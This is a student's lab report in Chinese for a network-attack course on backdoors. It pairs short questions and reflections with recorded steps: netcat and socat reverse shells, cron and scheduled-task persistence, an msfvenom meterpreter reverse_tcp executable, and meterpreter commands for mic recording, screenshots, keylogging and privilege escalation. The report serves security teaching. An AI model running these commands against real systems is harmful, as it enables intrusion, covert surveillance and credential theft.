• 20145203盖泽双《网络对抗技术》后门原理与实践


    20145203盖泽双《网络对抗技术》后门原理与实践

    1.基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    ①连接带有后门病毒的网页。

    ②下载带有后门病毒的文件。

    ③主动连接不知名的私人网络。

    ④使用带有后门病毒的U盘或者硬盘。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    ①cron启动方式。

    ②任务启动计划。

    ③windows或者linux反弹连接向它们注入后门的系统。

    (3)Meterpreter有哪些给你映像深刻的功能?

    ①可以抓取被控主机的击键记录,以便获取被控主机的重要的用户名密码。

    ②可以控制被控主机的摄像头,窥探隐私很方便,可怕!

    ③可以获取被控主机的屏幕,随时了解被控用户的动态。

    (4)如何发现自己有系统有没有被安装后门?

    ①如果被杀毒软件检测出有病毒程序,有可能就是后门。

    ②电脑cpu占用较高,经常死机,有可能被注入了后门程序。

    ③数据经常莫名丢失,文件打不开或者提示已损坏,很有可能被人植入了后门程序。

    2.实验总结与体会

    经过这次实验,我感触最深的就是了解到了杀毒软件的重要性。在我的旧电脑上,我一个杀毒软件也没有装,我觉得360经常会造成卡机,电脑管家不好用,其他的还要掏钱买,就觉得没有必要把钱花在这个上面,电脑自身的防火墙应该就足够了,以至于我的旧电脑寿命并不是很长。在这次实验中,我使用的是自己的新电脑,上面有迈克菲杀毒软件,我发现无论我怎么将后门程序放到可信任区,或者取消它的母文件的扫描。这个后门病毒都可以被检测出来,只有把迈克菲的防火墙和实时扫描关掉,后门程序才可以被运行。我的电脑的到了很好的保护,而且被后门软件控制的结果太可怕了,所以我决定迈克菲过期之后续费!
    这个实验告诫了我们,在现在的电子信息高速发展的时代,自己的私人信息很容易被窃取,篡改。我们一定要有安全防范意识,尽可能的保护自己不受网络暴力的侵害。

    3.实践过程记录

    1、使用netcat获取主机操作Shell,cron启动。

       netcat:网络工具中的瑞士军刀,可在两台电脑之间建立链接并返回两个数据流 通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向来实现我们今天的后门。
    

    (1)windows获取linux shell。
    ①windows打开监听,以便于在linux反弹连接时可获取其shell。
    ncat.exe -l -p 5203

    ②linux根据windows的ip地址进行反弹连接。
    ipconfig
    nc 192.168.43.151 5203 -e /bin/sh

    ③windows获取其shell并对其文件进行修改。

    (2)windows对linux设置cron启动

        cron启动作用:windows对linux设置cron启动之后,windows将会在每个固定的时间点获取linux的shell。
    

    ①在linux中,使用crontab指令增加一条定时任务。

    ②在windows终端进行端口监听,等到时间到了之后,进行ls操作。

    (3)linux获取windows shell
    ①linux下查看ip地址。
    ifconfig

    ②linux进行端口监听。

    ③windows根据linux的ip地址进行反弹连接。

    ④linux获取windows shell,并对其进行操作

    2、使用socat获取主机操作Shell, 任务计划启动。

       socat是netcat(nc)的替代产品,是一个多功能的网络工具,名字来由是Socket CAT,可以看作是netcat的N倍加强版。socat的特点就是在两个流之间建立一個双向的通道。socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。
    

    ①在linux中,使用 socat命令进行端口监听。
    socat tcp-listen:5203 exec:bash,pty,stderr

    ②在windows下,对linux进行反弹连接。并打开其20145203文件夹进行ls操作。
    socat readline tcp:192.168.19.129:5203

    ③打开windows控制面板中的管理工具,选择任务计划程序,新建任务。

    ④在新建任务窗口填写任务名字为20145203,并设置触发器以及操作。设置好后,运行该任务。


    ⑤因为换了无线网,所以电脑的ip地址有所改变,所以重新ipconfig一下。

    ⑥在linux下,根据windows的ip地址对其5203端口进行连接。成功获得其windows shell。
    socat - tcp:192.168.2.151:5203

    3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

      MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大。
    

    ①在linux下,生成反弹式端口型的后门程序。
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=5203 -f exe >5203.exe
    注意因为是反弹式端口型,所以这里生成后门程序中的ip地址,是虚拟机的ip地址。

    ②在linux下,将后门文件发送到windows主机上。
    ncat -nv 172.30.4.157 5203 < 5203.exe

    ③windows下接收该后门程序,并将该后门文件设置为可信任文件,允许其通过防火墙进行通信。
    ncat.exe -lv 5203>5203.exe

    ④在linux下输入msfconsole,进入到msf平台。

    ⑤修改ip地址为虚拟机的ip地址。修改端口号为5203。并进行查看。
    set LHOST 192.168.52.129
    set LPORT 5203
    show options

    ⑥在linux下,打开后门程序的监听进程。在windows下运行该后门程序。linux成功获取windows的shell。

    4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

    ①获取目标主机音频。
    record_mic

    ②获取目标主机屏幕。
    screenshot

    ③获取目标主机的击键记录。
    keyscan_start
    keyscan_dump

    ④尝试提权。
    getsystem

  • 相关阅读:
    将Oracle数据库设置为归档模式 & Oracle 9i启动归档
    修改用户家目录
    使用Pam_Tally2锁定和解锁SSH失败的登录尝试
    linux系统用户锁定与解锁
    Linux用户密码过期 FAILED to authorize user with PAM (Authentication token is no longer valid; new one req)
    普通用户通过sudo su
    两台服务器配置互信
    red hat官方的rhel操作系统版本号与内核版本号的对应关系
    linux修改IP地址
    Docker学习(12) Dockerfile构建过程
  • 原文地址:https://www.cnblogs.com/GZSdeboke/p/6573100.html
Copyright © 2020-2023  润新知